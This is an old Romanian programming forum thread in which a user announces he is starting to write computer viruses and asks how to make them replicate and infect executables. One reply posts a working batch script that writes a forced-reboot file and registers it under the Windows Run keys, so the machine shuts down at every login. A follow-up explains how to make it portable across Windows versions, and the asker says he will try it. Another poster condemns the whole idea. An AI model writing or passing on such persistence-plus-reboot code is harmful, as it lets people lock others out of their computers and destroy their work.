In plus, niscaiva informatii despre cum pot convinge un virus sa se multiplice si sa infecteze alte executabile? Sau poate un tutorial despre codul de asamblare? Orice material este binevenit. Si tineti minte: nu am invitat [e nimeni sa faca ceea ce fac eu :-P !
Hardcore programming: file table, MBR, assembler code Ma apuc de scris virusi! Need addition informations
Scris 23 March 2006 - 07:43 PM
In plus, niscaiva informatii despre cum pot convinge un virus sa se multiplice si sa infecteze alte executabile? Sau poate un tutorial despre codul de asamblare? Orice material este binevenit. Si tineti minte: nu am invitat [e nimeni sa faca ceea ce fac eu :-P !
Scris 28 March 2006 - 10:29 PM
on second thot nici noi n-o sa te invatam cum nici tu nu ai sa faci la randul tau . Frumos ca lucrezi in Pascal , that's how I started , incearca si C , poti face mai multe magarii in C
Scris 01 April 2006 - 02:13 PM
Scris 03 April 2006 - 08:17 PM
Scris 20 April 2006 - 06:58 PM
Scris 23 April 2006 - 09:13 PM
Insomnia, la Mar 28 2006, 10:29 PM, a spus:
on second thot nici noi n-o sa te invatam cum nici tu nu ai sa faci la randul tau . Frumos ca lucrezi in Pascal , that's how I started , incearca si C , poti face mai multe magarii in C
Nu-i nevoie sa-i faci in C sau in cine stie ce altceva. Uite in "Virusel" .bat:
echo @echo off>c:\windows\hartlell.bat echo break off>>c:\windows\hartlell.bat echo shutdown -r -t 00 -f>>c:\windows\hartlell.bat echo end>>c:\windows\hartlell.bat reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f reg add hkey_current_user\software\microsoft\windows\currentversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
00=nr secunde
Cand utilizatorul aprinde calculatorul "viruselul" ii inchide windowsul instantaneu (00 secunde).
Scris 27 April 2006 - 03:26 PM
iar daca faci unul, trebuie sa te gandesti sa ruleze pe toate versiunile
sau poate windows-ul e pe partitia, D, de exemplu, sau in folderul, WINNT,
atunci poti modifica " c:\windows\ " in " %windir% "
sunt multe posibilitati.
eu de ex. folosesc vb poate face multe lucruri in background.
Scris 06 May 2006 - 08:23 PM
Personal daca as gasi pe cineva care a facut un virus, care sa se raspindeasca si sa faca rau, nu stiu cum as reactiona, probabil nu m-as mai putea controla in actiunile mele. Pina acum am vazut ca nimeni de aici nu si-a pus problema de a face un antivirus destept.
Imagineaza-ti ca un medic chirurg sta 8-10 ore sa salveze viata unui om, si vine cineva si presara pe rana putin antrax, asa.... in gluma.... sa-i faca o poante medicului sau pacientului...
Sau dupa ce muncesti citeva zile si nopti la un proiect, iti bafa un destept un virusel, de 1 aprilie, deh! sa faca si el o gluma "buna" si cind sa predai si tu proiectul, iti sterge parte din programe sau iti pune HDD-ul la pamint. Sau poate habar nu aveti ce inseamna sa muncesti la un proiect in programare sau grafica, contabilitate sau mai stiu eu ce si din cauza unui "destept" sa vi se duca toata munca la ripa...
Parerea mea este ca acest topic e o gluma proasta in felul in care e pusa problema.
Scris 10 May 2006 - 07:38 PM
Scris 26 June 2006 - 03:03 PM
Apoi, Assiris: sunt absolut sigur ca tu nu ai citit primul post. Zice acolo ca virusii e ok sa-i scrii, NU E OK sa ii lasi liberi sa se raspandeasca. A, si o corectie mica: eu nu am invatat limbaj de programare ca sa scriu virusi, dar vreau sa scriu virusi pentru ca stiu programare
O sa incerc chestia aia cu fisierul batch, si revin cu un post.
Impartaseste acest subiect:
Subiecte similare
| Topic | Deschis de | Replici | Vizualizari | |
|---|---|---|---|---|
|
Query PL/SQL | criss5 | 1 | 2.486 |
|
javascript | TestWeb | 2 | 2.569 |
|
Emulator Pocket PC 2002 in VS.2005 | argv | 2 | 2.592 |
|
Yahoo Manager 2010 in Vb 6.0 | Compiled | 0 | 951 |